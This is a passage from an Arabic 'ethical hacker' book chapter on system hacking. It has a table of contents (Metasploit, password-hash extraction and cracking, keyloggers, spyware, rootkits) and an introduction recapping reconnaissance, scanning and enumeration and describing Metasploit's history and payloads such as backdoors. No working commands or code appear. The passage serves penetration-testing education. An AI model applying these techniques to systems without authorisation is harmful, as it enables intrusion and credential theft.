Professional Documents
Culture Documents
اﻟﮭﺎﻛﺮ اﻷﺧﻼﻗﻲ
(SYSTEM HACKING) اﺧﺗراق اﻟﻧظﺎم
By
CONTENTS
299 .. ................................................................: ھﻲ ﻛﺎﻻﺗﻰmsfconsole ﺑﻌض اﻷواﻣر اﻟﺷﺎﺋﻌﺔ اﻟﺗﻲ ﺳوف ﻧﺳﺗﺧدﻣﮭﺎ ﻋﻧد اﻟﺗﻌﺎﻣل ﻣﻊ وﺣدة اﻟﺗﺣﻛم
299 ......... ................................................................................................MSFCONSOLE ﺳوف ﻧﻘوم اﻻن ﺑﺗﻧﻔﯾذ ﻋﻣﻠﯾﺔ اﺧﺗراق ﺑﺎﺳﺗﺧدام
305 .................. ................................................................ Mastering Armitage, the graphical management tool for Metasploit
306 ........... ................................................................................................ﻟﻣﺎذا ﻧﺗﻌرف ﻋﻠﻰ ﺧﻣس أدوات وﻋﻧدﻧﺎ اداه واﺣده ﻓﻘط ﺗﻌﻣل ﻛل ھذا؟
341 ................. ................................................................................................ Extracting the Hashes from the SAM (Locally)
349 ... ................................................................................................JTR (John the Ripper): King of the Password Crackers
391 ............................................................................................... (How to Disable LM HASH) LM HASH ﻛﯾﻔﯾﺔ اﻟﻐﺎء ﺗﻔﻌﯾل اﺳﺗﺧدام
392 ...... ................................................................ How to Defend Against Password Cracking ﻛﯾف ﺗداﻓﻊ ﺿد ھﺟﻣﺎت ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور
393 ......... ................................................................Implement and Enforce A Strong Security Policy ﺗﻧﻔﯾذ وﻓرض ﺳﯾﺎﺳﺔ أﻣﻧﯾﺔ ﻗوﯾﺔ
397 ..... ................................................................ (How to Defend Against Privilege Escalation) ﻛﯾف ﺗداﻓﻊ ﺿد ھﺟوم ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات
405 ............................... (Methodology Of Attacker In Using Remote Keylogger) ﻋن ﺑﻌدKeyloggers ﻣﻧﮭﺟﯾﺔ اﻟﮭﺎﻛرز ﻓﻲ اﺳﺗﺧدام
411 ............... ................................................................................................ Keylogger for MAC: Amac Keylogger for MAC
415 .............................................................................................. ؟What Does the Spyware Do ﻣﺎ اﻟذي ﯾﻣﻛن أن ﯾﻔﻌﻠﮫ ﺑراﻣﺞ اﻟﺗﺟﺳس
445 .......... ................................................................................................Steps For Detecting Rootkits اﻟﺧطوات ﻻﻛﺗﺷﺎف اﻟروت ﻛت
462 .......................................................................................... "Data Embedding Security Schemes" ﻣﺧططﺎت أﻣن ﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت
479 ............... ................................................................ Steganography Detection Tool: Gargoyle Investigator Forensic Pro
5.1ﻣﻘﺪﻣﮫ
ﯾرﻛز اﻟﻛﺗﺎب ﻋﻠﻰ اﻷﺳﺎﺳﯾﺎت ،وأﻧﮭﺎ ﺑﻣﺛﺎﺑﺔ اﻹﻧذار اﻟﻧﮭﺎﺋﻲ ،ﻓﻣن اﻷھﻣﯾﺔ أن ﻧؤﻛد ﻋﻠﻰ أھﻣﯾﺔ اﺳﺗﻛﻣﺎل اﻟﺧطوات اﻟﺳﺎﺑﻘﺔ ﻗﺑل إﺟراء اﻻﺳﺗﻐﻼل
او اﻻﺧﺗراق .ﺣﯾث ﯾﻛون ﻣﻐرﯾﺎ ﺗﺟﺎوز ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع واﻟﻔﺣص واﻟﺗﻌداد واﻟﻘﻔز ﻣﺑﺎﺷرة إﻟﻰ ھذا اﻟﺟزء ،وھذا ﻋﻠﻰ ﻣﺎ ﯾرام ﻓﻲ اﻟوﻗت
اﻟراھن ،وﻟﻛن إذا ﻛﻧت ﻣن أي وﻗت ﻣﺿﻰ ﻟﺗﻌزﯾز ﻣﮭﺎراﺗك ﻓﯾﺟب ﻋﻠﯾك ﺗﺟﺎوز ﻣﺳﺗوى ،script kidsوﺳوف ﺗﺣﺗﺎج ﻹﺗﻘﺎن اﻟﺧطوات
اﻷﺧرى ﻛذﻟك .ﻓﺈن ﻋدم اﻟﻘﯾﺎم ﺑذﻟك ﻟﯾس ﻓﻘط ﺗﺣد ﺑﺷدة ﻣن ﻗدرﺗك ﻟﺗﻧﺿﺞ ﺑﻣﺛﺎﺑﺔ ﻣﺧﺗﺑر اﻻﺧﺗراق ﻟﻛﻧﮭﺎ ﺳﺗﻛون أﯾﺿﺎ ﻓﻲ ﻧﮭﺎﯾﺔ اﻟﻣطﺎف إﻋﺎﻗﺔ
اﻟﻧﻣو اﻟﺧﺎص ﺑك ﻛﺧﺑﯾر اﻻﺳﺗﻐﻼل .ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع واﻟﻔﺣص واﻟﺗﻌداد ﺗﺳﺎﻋدك ﻋﻠﻰ اﺣﻼل اﻟﻧظﺎم وﺗوﺟﯾﮫ اﻻﺳﺗﻐﻼل .ﻗﺑل اﻟﺑدء ﻣﻊ ﻧظﺎم
اﻟﻘرﺻﻧﺔ واﻻﺧﺗراق ،دﻋوﻧﺎ ﻧذھب ﺳرﯾﻌﺎ اﻟﻰ اﻟﻣراﺣل اﻟﺗﻲ ﻣررﻧﺎ ﺑﮭﺎ واﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗم ﺟﻣﻌﮭﺎ ﺣﺗﻰ اﻵن .ﻗﺑل ھذه اﻟوﺣدة ،ﻧﺎﻗﺷﻧﺎ اﻻﺗﻲ:
-1ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع )(Footprinting
Footprintingھو ﻋﻣﻠﯾﺔ ﺗﺟﻣﯾﻊ ﻟﻠﺑﯾﺎﻧﺎت اﻟﻣﺗﻌﻠﻘﺔ ﺑﺑﯾﺋﺔ ﺷﺑﻛﺔ اﺗﺻﺎل ﻣﻌﯾﻧﺔ .ﻋﺎدة ﯾﺗم ﺗطﺑﯾﻖ ھذه اﻟﺗﻘﻧﯾﺔ ﻟﻐرض اﯾﺟﺎد ﺳﺑل ﻻﻗﺗﺣﺎم ﺑﯾﺋﺔ
اﻟﺷﺑﻛﺔ .ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻣﮭﺎﺟﻣﺔ اﻟﻧظﺎم ،وﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ أﯾﺿﺎ ﻓﻲ اﻟﺣﻣﺎﯾﺔ .ﻓﻲ ﻣرﺣﻠﺔ ،Footprintingإن اﻟﻣﮭﺎﺟم ﯾﻘوم ﺑﺈﻧﺷﺎء ﻣﻠف
ﺗﻌرﯾﻔﻲ ﻟﻠﻣﻧظﻣﺔ اﻟﻣﺳﺗﮭدﻓﺔ ،ﻣﻊ ﻣﻌﻠوﻣﺎت ﻣﺛل ﻧطﺎق ﻋﻧﺎوﯾن ،IPاﻷﺳﻣﺎء ) ،(namespaceواﺳﺗﺧدام اﻟﻣوظﻔﯾن ﻟﺷﺑﻛﺔ اﻹﻧﺗرﻧت.
Footprintingﯾﺣﺳن ﺳﮭوﻟﺔ اﺧﺗراق اﻟﻧظم ﻣن ﺧﻼل اﻟﻛﺷف ﻋن ﻧﻘﺎط اﻟﺿﻌف ﻓﻲ اﻟﻧظﺎم .ﺗﺣدﯾد اﻟﮭدف وﻣوﻗﻌﮫ ھﻲ اﻟﺧطوة اﻷوﻟﯾﺔ
اﻟﻣوﺟودة ﻓﻲ. Footprinting
ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،ﺻﻔﺣﺔ اﻟوﯾب ﻣن اﻟﻣﻧظﻣﺔ ﻧﻔﺳﮭﺎ ﻗد ﺗوﻓر ﺳﯾر اﻟﻣوظﻔﯾن أو ﻣﻌﻠوﻣﺎت ﺷﺧﺻﯾﮫ ،اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﮭﺎﻛر
ﺑﺎﺳﺗﺧداﻣﮫ ﻟﻠﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ ﻟﻠوﺻول إﻟﻰ اﻟﮭدف .إﺟراء اﺳﺗﻌﻼم Whoisﻋن ﻣوﻗﻊ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﯾوﻓر ﻣﻌﻠوﻣﺎت ﻋن اﻟﺷﺑﻛﺎت
اﻟﻣرﺗﺑطﺔ وأﺳﻣﺎء اﻟﻧطﺎﻗﺎت ذات اﻟﺻﻠﺔ ﻟﻣﻧظﻣﺔ ﻣﻌﯾﻧﺔ.
-2ﻋﻣﻠﯾﺔ اﻟﻔﺣص )(Scanning
) Scanningاﻟﻔﺣص( ھو إﺟراء ﻟﺗﺣدﯾد اﻟﻣﺿﯾﻔﯾن اﻟﻧﺷطﺎء ﻋﻠﻰ اﻟﺷﺑﻛﺔ او ﻣﺎ ﯾﺳﻣﻰ ﺒ ،live hostsإﻣﺎ ﻟﻐرض ﺗﻘﯾﯾم أﻣن اﻟﺷﺑﻛﺎت أو
ﻟﻣﮭﺎﺟﻣﺗﮭم .ﻓﻲ ﻣرﺣﻠﺔ اﻟﻔﺣص ،ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﺟد ﻣﻌﻠوﻣﺎت ﺣول ﺗﻘﯾﯾم اﻟﻣﺳﺗﮭدف ﻣن ﺧﻼل ﻋﻧﺎوﯾن IPاﻟﺧﺎﺻﺔ ﺑﮫ اﻟﺗﻲ ﯾﻣﻛن اﻟوﺻول إﻟﯾﮫ
ﻋﺑر اﻹﻧﺗرﻧت .اﻟﻔﺣص ﯾﮭﺗم أﺳﺎﺳﺎ ﺑﺗﺣدﯾد اﻟﻧظم ﻋﻠﻰ اﻟﺷﺑﻛﺔ وﺗﺣدﯾد اﻟﺧدﻣﺎت اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﻛل ﻛﻣﺑﯾوﺗر.
ﺑﻌض اﻹﺟراءات ﻣﺛل ﻓﺣص اﻟﻣﻧﺎﻓذ/اﻟﺑورﺗﺎت اﻟﻣﯾﻧﺎء و Ping swapﺗﻘدم ﻟك ﻣﻌﻠوﻣﺎت ﺣول اﻟﺧدﻣﺎت اﻟﻣﻘدﻣﺔ ﻣن ﻗﺑل اﻟﻣﺿﯾﻔﯾن اﻟﺣﯾﺔ اﻟﺗﻲ
ﺗﻧﺷط ﻋﻠﻰ اﻹﻧﺗرﻧت ،وﻋﻧﺎوﯾن IPاﻟﺧﺎﺻﺔ ﺑﮭﺎ .إﺟراء اﻟﻔﺣص ورﺳم اﻟﺧراﺋط اﻟﻌﻛﺳﯾﺔ ﯾرﺟﻊ ﻟك ﻣﻌﻠوﻣﺎت ﺣول ﻋﻧﺎوﯾن IPاﻟﺗﻲ ﻻ ﺗﻌﯾﯾن
إﻟﻰ اﻟﻣﺿﯾﻔﯾن اﻟﺣﻲ؛ وھذا ﯾﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻟﺟﻌل اﻓﺗراﺿﺎت ﺣول اﻟﻌﻧﺎوﯾن اﻟﻣﻣﻛﻧﺔ.
-3ﻋﻣﻠﯾﺔ اﻟﺗﻌداد )(Enumeration
) Enumerationاﻟﺗﻌداد( ھو أﺳﻠوب اﻟﺗﺣﻘﯾﻖ ﻣن اﻟﺗطﻔل ﻓﻲ ﺗﻘﯾﯾم اﻟﮭدف ﻣن ﺧﻼﻟﮭﺎ اﻟﻣﮭﺎﺟﻣﯾن ﯾﻘوﻣوا ﺑﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت ﻣﺛل ﻗواﺋم ﻣﺳﺗﺧدم
اﻟﺷﺑﻛﺔ ،ﺟداول اﻟﺗوﺟﯾﮫ ،وﺑﯾﺎﻧﺎت ﺑروﺗوﻛول إدارة اﻟﺷﺑﻛﺔ) . (SNMPھذا اﻷﻣر ﺿروري ﻷن اﻟﻣﮭﺎﺟم ﯾﻌﺑر اﻻﻗﺎﻟﯾم اﻟﻣﺳﺗﮭدﻓﺔ ﻟﻛﺷف
اﻟﻣﻌﻠوﻣﺎت ﻋن اﻟﺷﺑﻛﺔ ،وﻣﺷﺎرﻛﺎت اﻟﻣﺳﺗﺧدﻣﯾن ،واﻟﺟروب ،واﻟﺗطﺑﯾﻘﺎت ،و.banners
ھدف اﻟﻣﮭﺎﺟم ھو ﺗﺣدﯾد ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدم اﻟﺻﺎﻟﺣﺔ أو اﻟﻣﺟﻣوﻋﺎت ﺣﯾث ﯾﻣﻛن أن ﯾﺑﻘﻰ ﻏﯾر واﺿﺢ ﻋﻧد اﺧﺗراق اﻟﻧظﺎم .اﻟﺗﻌداد ﯾﺷﻣل إﺟراء
اﺗﺻﺎﻻت ﻧﺷطﺔ ﻟﻧظﺎم اﻟﮭدف أو إﺧﺿﺎﻋﮭﺎ ﻟﺗوﺟﯾﮫ اﻻﺳﺗﻔﺳﺎرات .ﻋﺎدة ،ﻧظﺎم اﻟﺗﻧﺑﯾﮫ واﻷﻣن ﺳوف ﯾﻘوم ﺑﺗﺳﺟﯾل ﻣﺛل ھذه اﻟﻣﺣﺎوﻻت ﻓﻲ
ﻣﻠﻔﺎت اﻟﺳﺟل .ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﻛون اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﯾﺗم ﺟﻣﻌﮭﺎ ھو ﻣﺎ ﻗد ﯾﺳﺗﮭدﻓﮭﺎ اﻟﻣﮭﺎﺟم ﻗد ﺗﻛون ﻋﺎﻣﮫ ،ﻣﺛل ﻋﻧوان DNS؛ وﻣﻊ ذﻟك ،ﻓﻣن
اﻟﻣﻣﻛن أن ﯾﺗﻌﺛر اﻟﻣﮭﺎﺟم ﻋﻠﻰ ﻣﺷﺎرﻛﺔ IPCﻋن ﺑﻌد ،ﻣﺛل IPC$ﻓﻲ وﯾﻧدوز ،واﻟﺗﻲ ﯾﻣﻛن ﺑﺣﺛﮭﺎ ﻣﻊ Null Sessionواﻟﺗﻲ ﺗﺳﻣﺢ ﺑﺎن ﯾﺗم
ﺗﻌداد اﻟﻣﺷﺎرﻛﺔ واﻟﺣﺳﺎﺑﺎت.
ﻋﻣﻠﯾﺔ اﻻﺧﺗراق )(Exploitationھﻲ واﺣدة ﻣن أﻛﺛر اﻟﻣراﺣل ﻏﻣوﺿﺎ واﻟﺗﻲ ﺳوف ﻧﻐطﯾﮭﺎ .اﻟﺳﺑب ﻓﻲ ذﻟك ﺑﺳﯾط؛ ﻛل ﻧظﺎم ﯾﺧﺗﻠف ﻋن
اﻵﺧر وﻟﻛل ھدف ﻓرﯾد ﻣن ﻧوﻋﮫ .اﻋﺗﻣﺎدا ﻋﻠﻰ ﻋدد واﻓر ﻣن اﻟﻌواﻣل ،وھﺟوﻣك ﯾﺧﺗﻠف ﻣن ھدف إﻟﻰ ھدف .أﻧظﻣﺔ اﻟﺗﺷﻐﯾل اﻟﻣﺧﺗﻠﻔﺔ
) ،(OSsواﻟﺧدﻣﺎت اﻟﻣﺧﺗﻠﻔﺔ ،واﻟﻌﻣﻠﯾﺎت اﻟﻣﺧﺗﻠﻔﺔ ﺗﺗطﻠب أﻧواﻋﺎ ﻣﺧﺗﻠﻔﺔ ﻣن اﻟﮭﺟﻣﺎت .اﻟﻣﮭﺎﺟﻣﯾن اﻟﻣﮭرة اﻟﺗﻲ ﺗﻔﮭم اﻟﻔروق اﻟدﻗﯾﻘﺔ ﻓﻲ ﻛل ﻧظﺎم
ﯾﺣﺎوﻟون اﺳﺗﻐﻼﻟﮭﺎ .ﻣﻊ اﺳﺗﻣرار ﻣﮭﺎراﺗك ﻓﻲ اﻟﺗﻘدم ،ﻓﺳوف ﺗﺣﺗﺎج ﻟﺗوﺳﯾﻊ ﻣﻌرﻓﺗك ﻟﻸﻧظﻣﺔ وﻧﻘﺎط ﺿﻌﻔﮭم .إذا ﺗﺣدﺛﻧﺎ ﻋن اﻻﺧﺗراق ﻓﻘﺑل ﻛل
ﺷﻲء ،ﺳوف ﻧﺗﺣدث ﻋن metasploitﺣﯾث ﺗﻌﺗﺑر ھذه اﻷداة ﻣن اھم اھم أدوات اﻻﺧﺗراق.
METASPLOIT 5.2
ﻣن ﻛل اﻷدوات اﻟﺗﻲ ﻧوﻗﺷت ﻓﻲ ھذا اﻟﻛﺗﺎب واﻟﺗﻲ ﺳوف ﺗﻧﺎﻗش Metasploit ،ھو اﻟﻣﻔﺿل .ﻓﻲ ﻧواح ﻛﺛﯾرة ،ھو اﻷداة اﻟﻣﺛﺎﻟﯾﺔ ﻟﻠﻘراﺻﻧﺔ.
ﺣﯾث ﯾﺗﻣﯾز ﺑﺎﻟﻘوة واﻟﻣروﻧﺔ ،ﻣﺟﺎﻧﻲ ،وﯾﺣﻣل ﻣﻌﮫ أدوات راﺋﻌﺔ .ﻣن دون أدﻧﻰ ﺷك ﺗﻌﺗﺑر أروع أداة ھﺟوﻣﯾﺔ ﻣﺷﻣوﻟﺔ ﻓﻲ ھذا اﻟﻛﺗﺎب ،وﺣﺗﻰ
ﻓﻲ ﺑﻌض اﻟﺣﺎﻻت ﻷﻧﮭﺎ ﺗﺗﯾﺢ ﻟك اﻹﺧﺗراق ﻣﺛل ھﯾو ﺟﺎﻛﻣﺎن ﻓﻲ ﻓﯾﻠم !Swordfishﻋﻠﻰ ﻣﺣﻣل اﻟﺟد ،أﻧﮭﺎ ﺟﯾدة .ھذه اﻷداة ﺳوف ﯾﺳرد ﻟﮭﺎ
ﻛﺗﺎب ﻛﺎﻣل ﻻﺣﻘﺎ ﯾﺗﻛﻠم ﻋﻧﮭﺎ ﻧظرا ﻷھﻣﯾﺗﮭﺎ وﻟﻛﻧﻧﺎ ھﻧﺎ ﺳوف ﻧﺗﻛﻠم ﻋن اﻻﺳﺎﺳﯾﺎت ﻓﻘط.
ﻓﻲ ﻋﺎم ،2004ﻓﻲ ،Defcon 12ﻓﺎن ﻛل ﻣن اﺗش دي ﻣورى ) (HD Mooreوﺳﺑوﻧم ) (Spoonmھزوا اﻟﻌﺎﻟم ﻋﻧدﻣﺎ أﻋطوا ﻣﺣﺎﺿرة
ﺑﻌﻧوان " :Metasploitاﻟﻘرﺻﻧﺔ ﻛﻣﺎ ﻓﻲ اﻷﻓﻼم"ُ .رﻛز ھذا اﻟﻌرض ﻋﻠﻰ " إطﺎرات اﻻﺧﺗراق ) ."(Exploit Frameworksإطﺎر
اﻻﺧﺗراق ) (exploit frameworkھو ﺑﻧﯾﺔ رﺳوﻣﯾﺔ ﻟﺗطوﯾر وإطﻼق .exploitاﻷطر) (frameworkﺗﺳﺎﻋد ﻓﻲ ﻋﻣﻠﯾﺔ اﻟﺗﻧﻣﯾﺔ ﻣن ﺧﻼل
ﺗوﻓﯾر اﻟﺗﻧظﯾم واﻟﻣﺑﺎدئ اﻟﺗوﺟﯾﮭﯾﺔ ﻟﻛﯾﻔﯾﺔ ﺗﺟﻣﯾﻊ ﻣﺧﺗﻠف اﻟﻘطﻊ وﺗﻔﺎﻋﻠﮭم ﻣﻊ ﺑﻌﺿﮭم اﻟﺑﻌض.
Metasploitﺑدأت ﻓﻌﻼ ﻛﻠﻌﺑﮫ ﻋﻠﻰ اﻟﺷﺑﻛﺔ ،وﻟﻛﻧﮭﺎ ﻗد ﺗﺣﻘﻖ ﻛﺎﻣل إﻣﻛﺎﻧﺎﺗﮭﺎ ﻋﻧدﻣﺎ ﯾﺗم ﺗﺣوﯾﻠﮭﺎ إﻟﻰ أداة ﻛﺎﻣﻠﺔ ﻓﻲ ﻋﻣﻠﯾﺔ اﻻﺧﺗراق .Exploit
Metasploitﯾﺣﺗوي ﻓﻲ اﻟواﻗﻊ ﻋﻠﻰ ﻣﺟﻣوﻋﺔ ﻣن اﻷدوات اﻟﺗﻲ ﺗﺷﻣل اﻟﻌﺷرات ﻣن اﻟوظﺎﺋف ﻣﺧﺗﻠﻔﺔ ﻷﻏراض ﻣﺧﺗﻠﻔﺔ وﻟﻛن رﺑﻣﺎ ﯾﻔﺿل
ﻣﻌرﻓﺔ إطﺎرات اﻻﺧﺗراق ) (Exploit Frameworksاﻟﻘوﯾﺔ واﻟﻣرﻧﺔ ﻣﻧﮭﺎ.
ﻗﺑل اﻻﻓراج ﻋن ،Metasploitﻛﺎن اﻟﺑﺎﺣﺛون ﻓﻲ اﻷﻣن ﻟدﯾﮭم ﺧﯾﺎرﯾن رﺋﯾﺳﯾﯾن :اﻣﺎ ان ﯾﺗﻣﻛﻧوا ﻣن ﺗطوﯾر اﻷﻛواد اﻟﻣﺧﺻﺻﺔ ﻋن طرﯾﻖ
اﻟﺗﻔﻛﯾك ﻣﻊ ﻣﺧﺗﻠف exploitو payloadsأو أﻧﮫ ﯾﻣﻛن أن ﯾﺳﺗﻐل واﺣدا ﻣن اﺛﻧﯾن ﻣن ) (Exploit Frameworksاﻟﻣﺗﺎﺣﺔ ﺗﺟﺎرﯾﺎ،
CORE Impactأو . ImmunitySec’s CANVASوﻛﻼھﻣﺎ ﯾﻌدوا ﺧﯾﺎرﯾن ﻋظﯾﻣﯾن وﻧﺎﺟﺣﯾن ﻟﻠﻐﺎﯾﺔ ﻓﻲ ﺣد ذاﺗﮭﻣﺎ .وﻟﻛن ﻟﻸﺳف،
ﻓﺈن ﺗﻛﻠﻔﺔ اﻟﺗرﺧﯾص واﺳﺗﺧدام ھذه اﻟﻣﻧﺗﺟﺎت ﻋﺎﻟﻲ ﻣﻣﺎ ﯾﻌﻧﻲ اﻧﮫ ﻟم ﯾﻛن ﻟدي اﻟﻌدﯾد ﻣن اﻟﺑﺎﺣﺛﯾن ﻓﻲ ﻣﺟﺎل اﻷﻣن اﻟوﺻول إﻟﯾﮭﺎ.
ﻛﺎن Metasploitﻣﺧﺗﻠﻔﺔ ﻋن ﻛل ﺷﻲء آﺧر ﻷﻧﮭﺎ اﻟﻣرة اﻷوﻟﻰ ،اﻟﺗﻲ ﯾﺗﺎح ) (Exploit Frameworksﻣﻔﺗوح اﻟﻣﺻدر ﻟﻛل ﻣن اﻟﻘراﺻﻧﺔ
وﻣﺧﺗﺑري اﻻﺧﺗراق ﻟﻠوﺻول إﻟﯾﮭﺎ .وھذا ﯾﻌﻧﻲ أﻧﮫ ﻟﻠﻣرة اﻷوﻟﻰ ،ﯾﺻﺑﺢ ) (Exploit Frameworksﻣﺗﺎﺣﮫ ﻟﻠﺟﻣﯾﻊ ،ﻣﻣﺎ أدى اﻟﻰ وﺟود
ﺗﻌﺎون ﺑﯾﻧﮭم ،وﺗطوﯾر ،Exploitوﺗﺑﺎدﻟﮭﺎ ﻓﯾﻣﺎ ﺑﯾﻧﮭم ﻣﺟﺎﻧﺎ.
Metasploitﯾﺳﻣﺢ ﻟك ﺑﺎﺧﺗﯾﺎر اﻟﮭدف واﻻﺧﺗﯾﺎر ﻣن ﺑﯾن ﻣﺟﻣوﻋﺔ واﺳﻌﺔ ﻣن Payloads .payloadsﻗﺎﺑﻠﺔ ﻟﻠﺗﺑﺎدل وﻻ ﯾﻣﻛن رﺑطﮭﺎ
ﺒ Exploitﻣﺣدده Payloads .ھﻲ "وظﺎﺋف إﺿﺎﻓﯾﺔ" أو ﺗﻐﯾﯾر ﻓﻲ اﻟﺳﻠوك اﻟذي ﺗرﯾد ﺗﺣﻘﯾﻘﮫ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف .ھذا ھو اﻟﺟواب ﻋﻠﻰ
اﻟﺳؤال" :ﻣﺎذا أرﯾد أن أﻓﻌل اﻵن ﻋﻠﻰ اﻟﺟﮭﺎز اﻟذي ﻟدي ﺳﯾطرة ﻋﻠﯾﮫ؟" ﺗﺷﻣل Metasploitال payloadsاﻷﻛﺛر ﺷﻌﺑﯾﺔ ھو إﺿﺎﻓﺔ
ﻣﺳﺗﺧدﻣﯾن ﺟدد ،وﻓﺗﺢ ،backdoorوﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ ﺟدﯾد ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف .وﺳﯾﺗم ﺗﻐطﯾﺔ ﻗﺎﺋﻣﺔ اﻟﻛﺎﻣﻠﺔ ﻠ Metasploit payloads
ﻗرﯾﺑﺎ.
ﻗﺑل أن ﻧﺑدأ ﻓﻲ ﺗﻐطﯾﺔ ﺗﻔﺎﺻﯾل ﻛﯾﻔﯾﺔ اﺳﺗﺧدام ،Metasploitﻓﻣن اﻟﻣﮭم أن ﻧﻔﮭم اﻟﻔرق ﺑﯾن Metasploitوﻓﺎﺣص ﻧﻘﺎط اﻟﺿﻌف
) .(Vulnerability scannerﻓﻲ ﻣﻌظم اﻟﺣﺎﻻت ،ﻋﻧدﻣﺎ ﻧﺳﺗﺧدم ﻓﺎﺣص ﻧﻘﺎط اﻟﺿﻌف ،اﻟﻔﺎﺣص ﺳوف ﯾﺗﺣﻘﻖ ﻓﻘط ﻟﻣﻌرﻓﺔ ﻣﺎ إذا ﻛﺎن
اﻟﻧظﺎم ھو ﻋرﺿﺔ ﻟﻠﺧطر .ﯾﺣدث ھذا ﺑطرﯾﻘﺔ ﺳﻠﺑﯾﺔ أي ﻻ ﯾﺗﻔﺎﻋل ﻣﻊ اﻟﻧظﺎم اﻟﮭدف ﺟدا ﻣﻊ ﻓرﺻﺔ ﺿﺋﯾﻠﺔ ﻣن أي ﺿرر ﻏﯾر ﻣﻘﺻود أو
ﺗﻌطﯾل ﻟﮭذا اﻟﮭدف .اﻣﺎ Metasploitوﻏﯾرھﺎ ﻣن Frameworkھﻲ أدوات اﺧﺗراق .ھذه اﻷدوات ﻻ ﺗؤدى اﺧﺗﺑﺎرات؛ وﻟﻛن ﺗﺳﺗﺧدم ھذه
اﻷدوات ﻹﻛﻣﺎل اﻻﺧﺗراق اﻟﻔﻌﻠﻲ ﻟﮭذا اﻟﮭدف .ﻓﺎﺣص ﻧﻘﺎط اﻟﺿﻌف ) (Vulnerability scannerﯾﺑﺣث ﻋن ﻧﻘﺎط اﻟﺿﻌف اﻟﻣﺣﺗﻣﻠﺔ وﺗﻘدﯾم
ﺗﻘرﯾر Metasploit .ﯾﺣﺎول ﻓﻌﻼ اﺳﺗﻐﻼل ﻧﻘﺎط اﻟﺿﻌف واﺧﺗراق اﻟﻧظﺎم اﻟذى ﯾﻔﺣﺻﮫ .ﺗﺄﻛد ﻣن أﻧك ﺗﻔﮭم ھذا.
ﻓﻲ ﻋﺎم ،2009ﺗم ﺷراء Metasploitﻣن ﻗﺑل .Rapid 7أﻣﺿﻰ اﺗش دي ﻣورى ) (HD Mooreﻗدرا ﻛﺑﯾرا ﻣن اﻟوﻗت ﯾوﺿﺢ ﻟﻠﻧﺎس
ﺑﺄن Metasploitﺳوف ﯾظل ﻣﺟﺎﻧﺎ .ﻋﻠﻰ اﻟرﻏم ﻣﻧذ ذﻟك اﻟﺣﯾن ﺗم اﻻﻓراج ﻋن اﻟﻌدﯾد ﻣن اﻟﻣﻧﺗﺟﺎت اﻟﺗﺟﺎرﯾﺔ اﻟﻛﺑﯾرة ﺑﻣﺎ ﻓﻲ ذﻟك
Metasploit Expressو ،Metasploit Proوﻛﺎن اﺗش دي ﻣورى ) (HD Mooreوﻓﯾﺎ ﻓﻲ ﻛﻠﻣﺗﮫ وﺑﻘﻲ ﻣﺷروع Metasploit
اﻷﺻﻠﻲ ﺣر وﻣﺟﺎﻧﺎ .ﻓﻲ اﻟواﻗﻊ ،ﻛﺎن ﺷراء Metasploitﺑواﺳطﺔ Rapid 7دﻓﻌﺔ ﻗوﯾﺔ ﻟﻠﻣﺷروع .Metasploitﻣﺷروع ﻣﻔﺗوح اﻟﻣﺻدر
ﯾﺳﺗﻔﯾد ﺑوﺿوح ﻣن اﻷدوات اﻟﺗﺟﺎرﯾﺔ اﻟﺗﻲ ﯾﺗم دﻓﻌﮭﺎ ﻣﻊ ﺗطوﯾر ﺑدوام ﻛﺎﻣل إﺿﺎﻓﯾﺔ ودﻋم .ﺳوف ﻧرﻛز ﻋﻠﻰ اﻷﺳﺎﺳﯾﺎت ھﻧﺎ ،وﻟﻛن إذا ﻛﻧت
ﺗرﻏب ﻓﻲ اﻟﺑﻘﺎء ﻋﻠﻰ رأس أﺣدث اﻟﺗطورات ﻓﻲ اﻟﻣﺳﺗﻘﺑل ﻓﺎﺳﺗﻣر ﻓﻲ اﻟﺗطوﯾر.
Metasploitﯾﻣﻛن ﺗﺣﻣﯾﻠﮭﺎ ﻣﺟﺎﻧﺎ ﻣن اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ:
http://www.metasploit.com/
إذا ﻛﻧت ﺗﺳﺗﺧدم ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ،ﻓﺎن Metasploitﻣﺛﺑت ﻓﻌﻠﯾﺎ ﺑﮫ .ھﻧﺎك اﻟﻌدﯾد ﻣن اﻟطرق اﻟﻣﺧﺗﻠﻔﺔ ﻟﻠﺗﻔﺎﻋل ﻣﻊ ،Metasploitوﻟﻛن
ﺳﯾرﻛز ھذا اﻟﻛﺗﺎب ﻋﻠﻰ اﺳﺗﺧدام ،واﺟﮭﺔ اﻟﻣﺳﺗﺧدم اﻟﻐﯾر رﺳوﻣﯾﺔ ) (GUIاو ﻣﺎ ﯾﺳﻣﻰ ﺑﺎﻟوﺟﮫ اﻟﻧﺻﯾﺔ ،واﻟذي ﯾﺳﻣﻰ .msfconsoleﺑﻣﺟرد
ﻓﮭم اﻷﺳﺎﺳﯾﺎت ،ﻓﺎن msfconsoleﺳوف ﯾﺻﺑﺢ ﺳرﯾﻊ ،ودي ،ﺑدﯾﮭﻲ ،وﺳﮭل اﻻﺳﺗﺧدام.
